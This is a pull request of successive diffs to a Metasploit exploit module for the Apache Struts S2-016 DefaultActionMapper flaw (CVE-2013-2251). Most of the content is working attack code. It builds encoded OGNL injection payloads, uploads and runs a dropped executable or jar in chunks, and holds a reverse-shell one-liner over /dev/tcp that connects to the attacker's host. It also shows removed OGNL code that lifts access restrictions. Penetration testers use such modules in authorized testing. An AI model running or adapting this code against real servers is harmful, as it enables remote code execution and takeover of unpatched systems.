### PR TITLE
Add Remote command execution module for Apache Struts <= 2.3.15 DefaultActionMapper vulnerability (S2-016)

### DIFF
--- a/modules/exploits/multi/http/struts_code_exec_default_action_mapper.rb
+++ b/modules/exploits/multi/http/struts_code_exec_default_action_mapper.rb
@@ -155,7 +155,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def check
 		# Initial parameter
 		http_method = datastore['HTTPMETHOD']
-		http_message = datastore['HTTP_MESSAGE']
+		http_message = Rex::Text::uri_encode(datastore['HTTP_MESSAGE'])
 		payload, proof = generate_struts_payload(nil, 'check')
 		uri = normalize_uri(target_uri.path)
 
@@ -216,7 +216,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def execute_command(cmd, opts = {})
 		# Initial parameter
 		http_method = datastore['HTTPMETHOD']
-		http_message = datastore['HTTP_MESSAGE']
+		http_message = Rex::Text::uri_encode(datastore['HTTP_MESSAGE'])
 		uri = normalize_uri(target_uri.path)
 
 		req = {
@@ -280,7 +280,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def platform_specific_stager(platform = {})
 		# Define payload properties
 		uri = normalize_uri(target_uri.path)
-		writable_dir = datastore['WritableDir'] + "/"
+		writable_dir = normalize_unix_path(datastore['WritableDir'] + "/")
 		chunk_length = datastore['CHUNK_LEN'].to_i
 
 		# Getting payload

--- a/modules/exploits/multi/http/struts_code_exec_default_action_mapper.rb
+++ b/modules/exploits/multi/http/struts_code_exec_default_action_mapper.rb
@@ -225,24 +225,9 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 		java_upload_part(jar, @payload_exe, append)
 
-		cmd = ""
-		# Enable static method accessible
-		cmd << "#_memberAccess[\"allowStaticMethodAccess\"]=true,"
-		# Disable Vararg handling (since it is buggy in OGNL used by Struts 2.1
-		cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
-		cmd << "#q.setAccessible(true),#q.set(null,true),"
-		cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
-		cmd << "#q.setAccessible(true),#q.set(null,false),"
-		# Create classloader
-		cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()})"
-		# Load class
-		cmd << ",#c=#cl.loadClass('metasploit.Payload')"
-		# Invoke main method
-		cmd << ",#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
-		cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
-
-		# Loading java payload on target machine
-		execute_command(cmd, 'java')
+		# Load and execute dropped jar
+		cmd = "java -jar #{@payload_exe}"
+		execute_command(cmd, 'cmd')
 	end
 
 	def on_new_session(client)

--- a/modules/exploits/multi/http/struts_code_exec_default_action_mapper.rb
+++ b/modules/exploits/multi/http/struts_code_exec_default_action_mapper.rb
@@ -22,10 +22,14 @@ class Metasploit3 < Msf::Exploit::Remote
 				In addition with any following information will be evaluated as OGNL expression against
 				the value stack resulting in command injection.
 
-				This module demonstrates remote command execution or vulnerable target.
+				This module demonstrates remote command execution on supported platform. In Payload
+				construction currently supports OGNL double evaluation syntax both %{} and ${} as
+				well as three variants of DefaultActionMapper which is "redirect:", "action:" and
+				"redirectAction:"
 
-				This module has been tested successfully on Apache Struts 2.3.15 over Tomcat 7, with
-				Red Hat Enterprise Linux 5 and Mac OS X Lion (10.7) operating systems
+				In additon, this module has been tested successfully on Apache Struts 2.3.15 over
+				Apache Tomcat 7 on Red Hat Enterprise Linux 5 and Mac OS X Lion (10.7.5 X86_64)
+				operating systems
 			},
 			'Author'         =>
 				[
@@ -43,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					[ 'BID', '61189' ],
 					[ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-016.html' ]
 				],
-			'Platform' 	 => [ 'osx', 'linux', 'java' ],
+			'Platform' 	 => [ 'linux', 'osx', 'java' ],
 			'Privileged'     => false,
 			'Targets'        =>
 				[
@@ -74,9 +78,9 @@ class Metasploit3 < Msf::Exploit::Remote
 					Opt::LPORT(4444),
 					Opt::RPORT(8080),
 					OptEnum.new('HTTPMETHOD', [ true, 'HTTP Method to use, GET or POST', 'GET', ['GET','POST']]),
-					OptEnum.new('OGNL_EVAL', [ true, 'OGNL expression evaluation opening bracket, % or $', '$', ['$','%']]),
-					OptEnum.new('STRUTS_ACTION', [ true, 'Possible Struts 2 DefaultActionMapper: action, redirect and redirectAction', 'redirect', ['action','redirect','redirectAction']]),
-					OptString.new('TARGETURI', [ true, 'The path to a struts application action i.e. /app/edit.action', ""]),
+					OptEnum.new('OGNL_EVAL', [ true, 'OGNL expression opening bracket, % or $', '$', ['$','%']]),
+					OptEnum.new('STRUTS_ACTION', [ true, 'Action of Struts 2 DefaultActionMapper: action, redirect and redirectAction', 'redirect', ['action','redirect','redirectAction']]),
+					OptString.new('TARGETURI', [ true, 'The path to a struts application action i.e. /struts2-showcase/skill/edit.action', ""]),
 					OptString.new('CMD', [ false, 'Execute a specific command', "" ]),
 					OptString.new('REVERSE_SHELL_CMD', [ false, 'Execute the pre-defined reverse bash shell command', "False" ])
 				], self.class)
@@ -92,6 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		tail = rand_text_alpha(6 + rand(4))
 		struts_action = datastore['STRUTS_ACTION']
 		ognl_eval = Rex::Text::uri_encode(datastore['OGNL_EVAL'])
+
 		# Construt the payload
 		case opts
 			when 'check'
@@ -190,11 +195,17 @@ class Metasploit3 < Msf::Exploit::Remote
 		execute_command(cmd, 'java')
 	end
 
-	def unix_stager
-		# Define dropper payload properties
-		@payload_exe = "/tmp/" + rand_text_alphanumeric(8+rand(8))
+	def platform_specific_stager(platform = {})
+		# Define payload properties
 		append = 'false'
-		exe = generate_payload_exe
+		case platform
+			when 'unix'
+				@payload_exe = "/tmp/" + rand_text_alphanumeric(8+rand(8))
+				exe = generate_payload_exe
+			when 'java'
+				@payload_exe = "/tmp/" + rand_text_alphanumeric(8+rand(8)) + ".jar"
+				exe = payload.encoded_jar.pack
+		end
 
 		# Uploading the generated payload
 		chunk_length = 384 # 512 bytes when base64 encoded
@@ -206,28 +217,13 @@ class Metasploit3 < Msf::Exploit::Remote
 		java_upload_part(exe, @payload_exe, append)
 
 		# Executing payload
-		execute_command("/bin/sh -c chmod@+x@#{@payload_exe}")
-		execute_command("/bin/sh -c #{@payload_exe}")
-	end
-
-	def java_stager
-		# Define dropper payload properties
-		@payload_exe = "/tmp/" + rand_text_alphanumeric(8+rand(8)) + ".jar"
-		append = 'false'
-		jar = payload.encoded_jar.pack
-
-		# Iterate dropping the generated payload
-		chunk_length = 384 # 512 bytes when base64 encoded
-		while(jar.length > chunk_length)
-			java_upload_part(jar[0, chunk_length], @payload_exe, append)
-			jar = jar[chunk_length, jar.length - chunk_length]
-			append='true'
+		case platform
+			when 'unix'
+				execute_command("/bin/sh -c chmod@+x@#{@payload_exe}")
+				execute_command("/bin/sh -c #{@payload_exe}")
+			when 'java'
+				execute_command("java -jar #{@payload_exe}")
 		end
-		java_upload_part(jar, @payload_exe, append)
-
-		# Load and execute dropped jar
-		cmd = "java -jar #{@payload_exe}"
-		execute_command(cmd, 'cmd')
 	end
 
 	def on_new_session(client)
@@ -244,7 +240,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
-		# Executing remote command
+		# Executing user's command
 		if not datastore['CMD'].empty?
 			print_status("Executing command")
 			execute_command(datastore['CMD'])
@@ -262,17 +258,17 @@ class Metasploit3 < Msf::Exploit::Remote
 			end
 		end
 
-		# Executing payload on target platform
+		# Executing payload on specific platform
 		case target['Platform']
 			when 'linux'
 				print_status("Executing payload on Linux platform")
-				unix_stager
+				platform_specific_stager('unix')
 			when 'osx'
 				print_status("Executing payload on Mac OS X platform")
-				unix_stager
+				platform_specific_stager('unix')
 			when 'java'
 				print_status("Executing payload on Java platform")
-				java_stager
+				platform_specific_stager('java')
 			else
 				fail_with(Exploit::Failure::NoTarget, "Unsupported target platform")
 		end

--- a/modules/exploits/multi/http/struts_code_exec_default_action_mapper.rb
+++ b/modules/exploits/multi/http/struts_code_exec_default_action_mapper.rb
@@ -85,21 +85,33 @@ class Metasploit3 < Msf::Exploit::Remote
 					OptEnum.new('OGNL_EVAL', [ true, 'OGNL expression opening bracket, % or $', '$', ['$','%']]),
 					OptEnum.new('OGNL_ENCODE', [ true, 'Encoding of OGNL expression', 'unicode', ['unicode','mixoctal','none']]),
 					OptEnum.new('STRUTS_ACTION', [ true, 'Action of Struts 2 DefaultActionMapper: action, redirect and redirectAction', 'redirect', ['action','redirect','redirectAction']]),
-					OptEnum.new('CHUNK_LEN', [ true, 'Chunk\'s length of uploaded code', '100', ['40','80','100','200','400']]),
+					OptEnum.new('CHUNK_LEN', [ true, 'Chunk\'s length of uploaded payload', '100', ['40','80','100','200','400']]),
 					OptString.new('TARGETURI', [ true, 'The path to a struts application action i.e. /struts2-showcase/skill/edit.action', ""]),
 					OptString.new('CMD', [ false, 'Execute a specific command', "" ]),
 					OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
-					OptString.new("PARAMETER", [ false, "HTTP GET or POST message", "" ]),
+					OptString.new("HTTP_MESSAGE", [ false, "HTTP GET or POST message", "" ]),
 					OptBool.new('REVERSE_SHELL_CMD', [ false, 'Execute the pre-defined reverse bash shell command', false ])
 				], self.class)
 	end
 
-	def ognl_encode(str, opts = {})
-		if opts == "unicode"
-			return str.unpack('U*').map{ |i| "\\u" + i.to_s(16).rjust(4,'0') }.join
-		elsif opts == "mixoctal"
-			return str.unpack('U*').map{ |i| "\\" + i.to_s(8).rjust(3,'0') }.join
+	def vprint_http_message(req, res)
+		# Print request
+		msg = ""
+		if req["method"] == 'POST'
+			msg << req["method"].to_s + " " + req["uri"].to_s + "\n\n"
+			msg << req["data"].to_s + "\n"
+		else
+			msg << req["method"].to_s + " " + req["uri"].to_s + "?" + req["query"].to_s + "\n"
 		end
+		vprint_debug("Request:\n" + msg)
+
+		# Print response
+		vprint_debug("Response:\n" + res.to_s[0,300])
+	end
+
+	def ognl_encode(str, opts = {})
+		return str.unpack('U*').map{ |i| "\\u" + i.to_s(16).rjust(4,'0') }.join if opts == "unicode"
+		return str.unpack('U*').map{ |i| "\\" + i.to_s(8).rjust(3,'0') }.join if opts == "mixoctal"
 	end
 
 	def generate_struts_payload(cmd, opts = {})
@@ -135,22 +147,38 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 
 		# Return generated payload
-		payload = "?#{struts_action}:#{ognl_eval}{#{ognl}}=#{tail}"
+		payload = "#{struts_action}:#{ognl_eval}{#{ognl}}=#{tail}"
 		return [ payload, proof ] if opts == "check"
 		return payload
 	end
 
 	def check
-		# Initial request parameter
+		# Initial parameter
 		http_method = datastore['HTTPMETHOD']
+		http_message = datastore['HTTP_MESSAGE']
 		payload, proof = generate_struts_payload(nil, 'check')
 		uri = normalize_uri(target_uri.path)
 
-		# Check whether target is reachable
-		res = send_request_cgi({
+		# Compose probe message
+		query = ""
+		query = http_message if http_message.length > 0
+
+		req = {
 			'uri' => uri,
 			'method' => http_method
-		})
+		}
+
+		case http_method
+			when 'GET'
+				req.merge!({ 'query' => query })
+			when 'POST'
+				req.merge!({ 'data' => query })
+		end
+
+		# Send probe request
+		res = send_request_cgi(req)
+
+		# Is target reachable
 		if res.nil? or res.code != 200
 			print_error("Target is not accessible - #{rhost}:#{rport}#{uri}")
 			return Exploit::CheckCode::Unknown
@@ -158,18 +186,26 @@ class Metasploit3 < Msf::Exploit::Remote
 			print_good("#{rhost}:#{rport}#{uri} is reachable")
 		end
 
-		# Check the target
-		uri << payload
-		res = send_request_cgi({
-			'uri' => uri,
-			'method' => http_method
-		})
 
-		# Request and response if verbose is enabled
-		vprint_debug("Request:\n#{http_method} #{uri}")
-		vprint_debug("Response:\n"+res.to_s)
+		# Compose check message
+		if http_message.length > 0
+			query = http_message + "&" + payload
+		else
+			query = payload
+		end
 
-		# Status of target
+		case http_method
+			when 'GET'
+				req.merge!({ 'query' => query })
+			when 'POST'
+				req.merge!({ 'data' => query })
+		end
+
+		# Send check message
+		res = send_request_cgi(req)
+		vprint_http_message(req, res)
+
+		# Is target vulnerable
 		if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/
 			return Exploit::CheckCode::Vulnerable
 		else
@@ -178,27 +214,45 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def execute_command(cmd, opts = {})
-		vprint_status("Attempting to execute: #{cmd}")
-		uri = normalize_uri(target_uri.path)
+		# Initial parameter
 		http_method = datastore['HTTPMETHOD']
+		http_message = datastore['HTTP_MESSAGE']
+		uri = normalize_uri(target_uri.path)
 
-		# Append injected command
+		req = {
+			'uri' => uri,
+			'method' => http_method
+		}
+
+		# Verbosely command executed
+		vprint_status("Attempting to execute: #{cmd}")
+
+		# Retrieve payload
+		payload = ""
 		case opts
 			when 'java'
-				uri << generate_struts_payload(cmd, 'java')
+				payload << generate_struts_payload(cmd, 'java')
 			else
-				uri << generate_struts_payload(cmd, 'cmd')
+				payload << generate_struts_payload(cmd, 'cmd')
 		end
 
-		res = send_request_raw({
-			'uri'     => uri,
-			'method'  => http_method
-		}, 5)
+		# Compose exploit message
+		if http_message.length > 0
+			query = http_message + "&" + payload
+		else
+			query = payload
+		end
 
-		# Request and response if verbose enabled
-		vprint_debug("Request:\n#{http_method} #{uri}")
-		vprint_debug("Response:\n"+res.to_s)
+		case http_method
+			when 'GET'
+				req.merge!({ 'query' => query })
+			when 'POST'
+				req.merge!({ 'data' => query })
+		end
 
+		# Send probe request
+		res = send_request_cgi(req, 5)
+		vprint_http_message(req, res)
 	end
 
 	def reverse_shell_cmd_stager
@@ -281,7 +335,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
-		# Initialize required variable
+		# Initial required variable
 		uri = normalize_uri(target_uri.path)
 
 		# Executing user's command

--- a/modules/exploits/multi/http/struts_code_exec_default_action_mapper.rb
+++ b/modules/exploits/multi/http/struts_code_exec_default_action_mapper.rb
@@ -81,6 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					OptEnum.new('OGNL_EVAL', [ true, 'OGNL expression opening bracket, % or $', '$', ['$','%']]),
 					OptEnum.new('OGNL_ENCODE', [ true, 'Encoding of OGNL expression', 'unicode', ['unicode','octal','none']]),
 					OptEnum.new('STRUTS_ACTION', [ true, 'Action of Struts 2 DefaultActionMapper: action, redirect and redirectAction', 'redirect', ['action','redirect','redirectAction']]),
+					OptEnum.new('CHUNK_LEN', [ true, 'Chunk\'s length of uploaded code', '100', ['40','80','100','200','400']]),
 					OptString.new('TARGETURI', [ true, 'The path to a struts application action i.e. /struts2-showcase/skill/edit.action', ""]),
 					OptString.new('CMD', [ false, 'Execute a specific command', "" ]),
 					OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
@@ -210,6 +211,9 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Define payload properties
 		writable_dir = datastore['WritableDir'] + "/"
 		append = 'false'
+		chunk_length = datastore['CHUNK_LEN'].to_i
+
+		# Getting payload
 		case platform
 			when 'unix'
 				@payload_exe = writable_dir + rand_text_alphanumeric(8+rand(8))
@@ -220,7 +224,6 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 
 		# Uploading the generated payload
-		chunk_length = 384 # 512 bytes when base64 encoded
 		while(exe.length > chunk_length)
 			java_upload_part(exe[0, chunk_length], @payload_exe, append)
 			exe = exe[chunk_length, exe.length - chunk_length]

--- a/modules/exploits/multi/http/struts_code_exec_default_action_mapper.rb
+++ b/modules/exploits/multi/http/struts_code_exec_default_action_mapper.rb
@@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'sinn3r',       # Original metasploit module for DefaultActionMapper
 					'juan vazquez', # Original metasploit module for DefaultActionMapper
 					'mihi', # Original ARCH_JAVA support
-					'Lersak Limwiwatkul (Joe) <lersak[@]gmail.com>' # Remote command execution support
+					'Lersak Limwiwatkul <lersak[@]gmail.com>' # Remote command execution support
 				],
 			'License'        => MSF_LICENSE,
 			'References'     =>
@@ -82,12 +82,8 @@ class Metasploit3 < Msf::Exploit::Remote
 					OptEnum.new('STRUTS_ACTION', [ true, 'Action of Struts 2 DefaultActionMapper: action, redirect and redirectAction', 'redirect', ['action','redirect','redirectAction']]),
 					OptString.new('TARGETURI', [ true, 'The path to a struts application action i.e. /struts2-showcase/skill/edit.action', ""]),
 					OptString.new('CMD', [ false, 'Execute a specific command', "" ]),
-					OptString.new('REVERSE_SHELL_CMD', [ false, 'Execute the pre-defined reverse bash shell command', "False" ])
+					OptBool.new('REVERSE_SHELL_CMD', [ false, 'Execute the pre-defined reverse bash shell command', false ])
 				], self.class)
-	end
-
-	def to_boolean(s)
-		return !!(s =~ /^(true|t|yes|y|1)$/i)
 	end
 
 	def generate_struts_payload(opts = {})
@@ -148,8 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def execute_command(cmd, opts = {})
 		vprint_status("Attempting to execute: #{cmd}")
-		cmds = cmd
-		uri = String.new(datastore['TARGETURI'])
+		uri = normalize_uri(target_uri.path)
 		http_method = datastore['HTTPMETHOD']
 
 		# Append injected command
@@ -159,8 +154,8 @@ class Metasploit3 < Msf::Exploit::Remote
 				uri.gsub!(/CMD/, Rex::Text::uri_encode(cmd))
 			else
 				uri << generate_struts_payload('cmd')
-				cmds.gsub!(' ','\',\'')
-				cmds.gsub!('@',' ')
+				cmd.gsub!(' ','\',\'')
+				cmd.gsub!('@',' ')
 				uri.gsub!(/CMD/, Rex::Text::uri_encode(cmd))
 		end
 
@@ -178,13 +173,15 @@ class Metasploit3 < Msf::Exploit::Remote
 	def reverse_shell_cmd_stager
 		# Retrieve target machine and port
 		target = datastore['LHOST'].to_s
-		port = String.new(datastore['LPORT'].to_s)
+		port = datastore['LPORT'].to_s
+
 		# Embedded one liner reverse shell with shell interpreter
-		cmds = "/bin/sh -c /bin/sh@-i@&>@/dev/tcp/HOST/PORT@0>&1@2>&1"
-		cmds.gsub!(/HOST/, target)
-		cmds.gsub!(/PORT/, port)
+		cmd = "/bin/sh -c /bin/sh@-i@&>@/dev/tcp/HOST/PORT@0>&1@2>&1"
+		cmd.gsub!(/HOST/, target)
+		cmd.gsub!(/PORT/, port)
+
 		# Execute reverse bash shell command
-		execute_command(cmds)
+		execute_command(cmd)
 	end
 
 	def java_upload_part(part, filename, append = 'false')
@@ -229,9 +226,14 @@ class Metasploit3 < Msf::Exploit::Remote
 	def on_new_session(client)
 		# Traditional payload
 		if client.type != "meterpreter"
-			print_error("Please use a meterpreter payload in order to automatically cleanup.")
-			print_error("The #{@payload_exe} file must be removed manually.")
-			return
+			if datastore['REVERSE_SHELL_CMD']
+				print_error("Press CTRL+C to exit from this session.")
+				return
+			else
+				print_error("Please use a meterpreter payload in order to automatically cleanup.")
+				print_error("The #{@payload_exe} file must be removed manually.")
+				return
+			end
 		end
 		# Meterpreter payload
 		client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
@@ -249,12 +251,10 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		# Executing reverse bash shell command
 		if target['Platform'] != "java"
-			if not datastore['REVERSE_SHELL_CMD'].empty?
-				if to_boolean(datastore['REVERSE_SHELL_CMD'])
-					print_status("Executing reverse bash shell command")
-					reverse_shell_cmd_stager
-					return
-				end
+			if datastore['REVERSE_SHELL_CMD']
+				print_status("Executing reverse bash shell command")
+				reverse_shell_cmd_stager
+				return
 			end
 		end
 

--- a/modules/exploits/multi/http/struts_code_exec_default_action_mapper.rb
+++ b/modules/exploits/multi/http/struts_code_exec_default_action_mapper.rb
@@ -22,14 +22,17 @@ class Metasploit3 < Msf::Exploit::Remote
 				In addition with any following information will be evaluated as OGNL expression against
 				the value stack resulting in command injection.
 
-				This module demonstrates remote command execution on supported platform. In Payload
+				This module demonstrates remote command execution on supported platform. Payload
 				construction currently supports OGNL double evaluation syntax both %{} and ${} as
-				well as three variants of DefaultActionMapper which is "redirect:", "action:" and
-				"redirectAction:"
+				well as three actions of DefaultActionMapper which is "redirect:", "action:" and
+				"redirectAction:". Various encoding scheme in OGNL payload including UNICODE, mixing
+				UNICODE and OCTAL and URL encoding are also supported. Note that mixing UNICODE and
+				OCTAL encoding scheme works only with Struts below 2.3.14.3 unless there is a configuration
+				of "struts.allowed.action.names" in struts.xml to allow OCTAL encoding in OGNL payload
 
 				In additon, this module has been tested successfully on Apache Struts 2.3.15 over
 				Apache Tomcat 7 on Red Hat Enterprise Linux 5 and Mac OS X Lion (10.7.5 X86_64)
-				operating systems
+				operating systems.
 			},
 			'Author'         =>
 				[
@@ -45,7 +48,8 @@ class Metasploit3 < Msf::Exploit::Remote
 					[ 'CVE', '2013-2251' ],
 					[ 'OSVDB', '95405' ],
 					[ 'BID', '61189' ],
-					[ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-016.html' ]
+					[ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-016.html' ],
+					[ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-015.html' ]
 				],
 			'Platform' 	 => [ 'linux', 'osx', 'java' ],
 			'Privileged'     => false,
@@ -79,25 +83,30 @@ class Metasploit3 < Msf::Exploit::Remote
 					Opt::RPORT(8080),
 					OptEnum.new('HTTPMETHOD', [ true, 'HTTP Method to use, GET or POST', 'GET', ['GET','POST']]),
 					OptEnum.new('OGNL_EVAL', [ true, 'OGNL expression opening bracket, % or $', '$', ['$','%']]),
-					OptEnum.new('OGNL_ENCODE', [ true, 'Encoding of OGNL expression', 'unicode', ['unicode','octal','none']]),
+					OptEnum.new('OGNL_ENCODE', [ true, 'Encoding of OGNL expression', 'unicode', ['unicode','mixoctal','none']]),
 					OptEnum.new('STRUTS_ACTION', [ true, 'Action of Struts 2 DefaultActionMapper: action, redirect and redirectAction', 'redirect', ['action','redirect','redirectAction']]),
 					OptEnum.new('CHUNK_LEN', [ true, 'Chunk\'s length of uploaded code', '100', ['40','80','100','200','400']]),
 					OptString.new('TARGETURI', [ true, 'The path to a struts application action i.e. /struts2-showcase/skill/edit.action', ""]),
 					OptString.new('CMD', [ false, 'Execute a specific command', "" ]),
 					OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
-					OptString.new("PARAMETER", [ true, "HTTP GET or POST message", "" ]),
+					OptString.new("PARAMETER", [ false, "HTTP GET or POST message", "" ]),
 					OptBool.new('REVERSE_SHELL_CMD', [ false, 'Execute the pre-defined reverse bash shell command', false ])
 				], self.class)
 	end
 
-	def ognl_encode(str, opt = {})
-		return str.unpack('U*').map{ |i| "\\u" + i.to_s(16).rjust(4,'0') }.join
+	def ognl_encode(str, opts = {})
+		if opts == "unicode"
+			return str.unpack('U*').map{ |i| "\\u" + i.to_s(16).rjust(4,'0') }.join
+		elsif opts == "mixoctal"
+			return str.unpack('U*').map{ |i| "\\" + i.to_s(8).rjust(3,'0') }.join
+		end
 	end
 
 	def generate_struts_payload(cmd, opts = {})
 		# Initial required parameter
-		proof = rand_text_alpha(6 + rand(4))
-		tail = rand_text_alpha(6 + rand(4))
+		proof = rand_text_alpha(8 + rand(4))
+		tail = rand_text_alpha(8 + rand(4))
+		rand = rand_text_alpha(8 + rand(4))
 		struts_action = datastore['STRUTS_ACTION']
 		ognl_eval = Rex::Text::uri_encode(datastore['OGNL_EVAL'])
 		ognl_encode = datastore['OGNL_ENCODE']
@@ -114,9 +123,13 @@ class Metasploit3 < Msf::Exploit::Remote
 				ognl = "(new java.lang.ProcessBuilder(new java.lang.String[]{'#{cmd}'})).start()"
 		end
 
-		# Encoding
+		# Unicode Encoding
 		if ognl_encode == "unicode"
 			ognl = ognl_encode(ognl, "unicode")
+		# Unicode and Octal Encoding
+		elsif ognl_encode == "mixoctal"
+			ognl = ognl_encode("('", "unicode") + ognl_encode(ognl, "mixoctal") + ognl_encode("')(#{rand})", "unicode")
+		# URL Encoding
 		else
 			ognl = Rex::Text::uri_encode(ognl)
 		end
@@ -268,6 +281,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
+		# Initialize required variable
 		uri = normalize_uri(target_uri.path)
 
 		# Executing user's command

--- a/modules/exploits/multi/http/struts_code_exec_default_action_mapper.rb
+++ b/modules/exploits/multi/http/struts_code_exec_default_action_mapper.rb
@@ -85,6 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					OptString.new('TARGETURI', [ true, 'The path to a struts application action i.e. /struts2-showcase/skill/edit.action', ""]),
 					OptString.new('CMD', [ false, 'Execute a specific command', "" ]),
 					OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
+					OptString.new("PARAMETER", [ true, "HTTP GET or POST message", "" ]),
 					OptBool.new('REVERSE_SHELL_CMD', [ false, 'Execute the pre-defined reverse bash shell command', false ])
 				], self.class)
 	end
@@ -138,8 +139,10 @@ class Metasploit3 < Msf::Exploit::Remote
 			'method' => http_method
 		})
 		if res.nil? or res.code != 200
-			print_error("Target is not accessible (#{rhost}:#{rport}#{uri})")
+			print_error("Target is not accessible - #{rhost}:#{rport}#{uri}")
 			return Exploit::CheckCode::Unknown
+		else
+			print_good("#{rhost}:#{rport}#{uri} is reachable")
 		end
 
 		# Check the target
@@ -150,8 +153,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		})
 
 		# Request and response if verbose is enabled
-		vprint_status("Request:\n#{http_method} #{uri}")
-		vprint_status("Response:\n"+res.to_s)
+		vprint_debug("Request:\n#{http_method} #{uri}")
+		vprint_debug("Response:\n"+res.to_s)
 
 		# Status of target
 		if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/
@@ -180,8 +183,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		}, 5)
 
 		# Request and response if verbose enabled
-		vprint_status("Request:\n#{http_method} #{uri}")
-		vprint_status("Response:\n"+res.to_s)
+		vprint_debug("Request:\n#{http_method} #{uri}")
+		vprint_debug("Response:\n"+res.to_s)
 
 	end
 
@@ -209,8 +212,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def platform_specific_stager(platform = {})
 		# Define payload properties
+		uri = normalize_uri(target_uri.path)
 		writable_dir = datastore['WritableDir'] + "/"
-		append = 'false'
 		chunk_length = datastore['CHUNK_LEN'].to_i
 
 		# Getting payload
@@ -224,14 +227,19 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 
 		# Uploading the generated payload
+		append = 'false'
+		print_status("Uploading payload to #{datastore['WritableDir']} on target #{rhost}:#{rport}:#{uri}")
 		while(exe.length > chunk_length)
+			print(".")
 			java_upload_part(exe[0, chunk_length], @payload_exe, append)
 			exe = exe[chunk_length, exe.length - chunk_length]
 			append='true'
 		end
 		java_upload_part(exe, @payload_exe, append)
+		print("\n"); print_good("Uploading payload completed")
 
 		# Executing payload
+		print_status("Executing payload on #{target['Platform']} platform")
 		case platform
 			when 'unix'
 				execute_command("/bin/sh -c chmod@+x@#{@payload_exe}")
@@ -249,7 +257,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				return
 			else
 				print_error("Please use a meterpreter payload in order to automatically cleanup.")
-				print_error("The #{@payload_exe} file must be removed manually.")
+				print_error("The #{@payload_exe} file may be removed manually.")
 				return
 			end
 		end
@@ -260,9 +268,11 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
+		uri = normalize_uri(target_uri.path)
+
 		# Executing user's command
 		if not datastore['CMD'].empty?
-			print_status("Executing command")
+			print_status("Executing remote command on #{rhost}:#{rport}:#{uri}")
 			execute_command(datastore['CMD'])
 			return
 		end
@@ -270,7 +280,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Executing reverse bash shell command
 		if target['Platform'] != "java"
 			if datastore['REVERSE_SHELL_CMD']
-				print_status("Executing reverse bash shell command")
+				print_status("Executing reverse bash shell command on #{rhost}:#{rport}:#{uri}")
 				reverse_shell_cmd_stager
 				return
 			end
@@ -279,13 +289,10 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Executing payload on specific platform
 		case target['Platform']
 			when 'linux'
-				print_status("Executing payload on Linux platform")
 				platform_specific_stager('unix')
 			when 'osx'
-				print_status("Executing payload on Mac OS X platform")
 				platform_specific_stager('unix')
 			when 'java'
-				print_status("Executing payload on Java platform")
 				platform_specific_stager('java')
 			else
 				fail_with(Exploit::Failure::NoTarget, "Unsupported target platform")

--- a/modules/exploits/multi/http/struts_code_exec_default_action_mapper.rb
+++ b/modules/exploits/multi/http/struts_code_exec_default_action_mapper.rb
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 				This module demonstrates remote command execution or vulnerable target.
 
-				This module has been tested successfully on Struts 2.3.15 over Tomcat 7, with
+				This module has been tested successfully on Stringruts 2.3.15 over Tomcat 7, with
 				Red Hat Enterprise Linux 5 and Mac OS X Lion (10.7) operating systems
 			},
 			'Author'         =>
@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					[ 'BID', '61189' ],
 					[ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-016.html' ]
 				],
-			'Platform' 	 => [ 'linux', 'java' ],
+			'Platform' 	 => [ 'osx', 'linux', 'java' ],
 			'Privileged'     => false,
 			'Targets'        =>
 				[
@@ -51,6 +51,12 @@ class Metasploit3 < Msf::Exploit::Remote
 						{
 							'Arch' => ARCH_X86,
 							'Platform' => 'linux',
+						}
+					],
+					[ 'Mac OS X Universal',
+						{
+							'Arch' => ARCH_X86,
+							'Platform' => 'osx',
 						}
 					],
 					[ 'Java Universal',
@@ -86,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		tail = rand_text_alpha(6 + rand(4))
